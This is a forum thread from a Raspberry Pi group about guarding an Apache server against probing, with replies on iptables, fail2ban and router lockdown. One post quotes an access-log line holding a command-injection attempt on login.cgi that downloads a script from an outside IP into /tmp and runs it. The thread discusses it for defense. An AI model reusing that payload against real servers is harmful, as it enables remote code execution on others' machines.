1. Home
  2. Raspberry Pi Group
  3. Do I need raspberry-pi?
  4. Page 2

Do I need raspberry-pi?

On a sunny day (Wed, 20 Jun 2018 14:43:04 GMT) it happened wrote in :

A warning!!! If you run apache webserver, make sure you use a decent firewall, I have been watching traffic for a while now to the raspi server after I posted the link, and see Russian and other countries hackers trying things, looking for a way to cause havoc:

31.207.194.8 - - [21/Jun/2018:10:45:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 499 "-" "Hello, World"

From

formatting link
31.207.194.8 Russian Federation Chelyabinskaya oblast' Chelyabinsk

Then I transferred the iptables file from by big server after seeing this, and all those bad IPs have no longer access, or for a very short time.. We know who you are! Wrote a lot of 'protection' scripts in the days when the servers were located here.

This is actually the reason I am now using godaddy webhosting, as there are more fun things to do than watching tail -n 100 -f /var/log/apache2/access.log every few minutes. The internet if full of lifeforms and bost trying things...

man iptables

There is also a simple program ip_to_country you can download from my site, but has not been updated in many years, even forgot I wrote it, when I was looking for a new version google led me to my own website, ?? found out I wrote it.... LOL OK, on the to-do list

Reply to
Jan Panteltje
Loading thread data ...

I do run IPtables on my million hit a day apache server, but frankly its only use is to allow my (fixed) IP address unrestricted accaess.

Apache itself if configured correctly will take any amount of abuse.

I just let it happen.

Only if DOS attacks slow the server unacceptably do I take any action.

Malware and ratware is a fact of life. Its only an issue if its an issue, so to speak!

--
Truth welcomes investigation because truth knows investigation will lead  
to converts. It is deception that uses all the other techniques.
Reply to
The Natural Philosopher

This is what fail2ban was made for.

No need to fiddle with iptables.

Reply to
Andreas Neumann

Agreed. If you want a quiet life and your ADSL router is any good, you can not only set it to refuse all inbound connections but also make it invisible from the outside. This doesn't restrict you at all because all usual activities (getting mail, reading newsgroups, web surfing, git, ftp and sftp transfers, software updates, ..,) are handled by your programs on your computers establishing connections to external servers.

I work this way all the time. My websites are externally hosted and updated by using ftp to copy pages to the webhost from the internal copy I use to add and edit pages and I use getmail to fetch mail from my ISP's smarthost. I periodically use Gibson Research Labs' ShieldsUp tool to check that my router is still locked up tight.

--
Martin    | martin at 
Gregorie  | gregorie dot org
Reply to
Martin Gregorie

On a sunny day (Thu, 21 Jun 2018 12:40:57 +0200) it happened Andreas Neumann wrote in :

Interesting, I see:

formatting link

about the same idea as my scripts do, iptabes is not that hard, in fact I find it easy to use in scripting:

/usr/local/sbin/ireject # this is called to add a input deny for an IP addres to iptables, # and save the configuration. if [ "$1" = "" ] then echo "Usage: ireject IP_address" exit 1 fi iptables -A INPUT -s $1 -p all -j DROP iptables -A OUTPUT -s $1 -p all -j REJECT /usr/sbin/iptables-save > /root/firewall exit 0

then you can do something like: tail -n 100 -f /var/log/apache2/access.log | awk '/cgi/{print $1}' root@raspberrypi:~# tail -n 100 -f /var/log/apache2/access.log | awk '/cgi/{print $1}'

187.183.152.135 31.207.194.8 31.207.194.8 31.207.194.8 31.207.194.8

shows you everybody who tried the cgi thing, then pipe it through sort 'unique', then ireject..... to add it to iptables permanently

there are so many ways... Its fun to write those scripts.

At startup do (automatically) iptables-restore < /root/firewall

etc etc These are just examples OK?

Reply to
Jan Panteltje

fail2ban for the win!

Reply to
mm0fmf

Not sure if RPi can handle two or three streams of HD video. Are those HD?

You best choice would be familiar and available system. If you can find older PC laying around that you can use for free, I'd go with it. Why exactly do you want to use RPi?

Reply to
Pabst Blue Ribbon

Haven't you heard? It's the cool thing to have, daddy-o. Get hip with the tiny chip.

Reply to
Rob Morley

ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.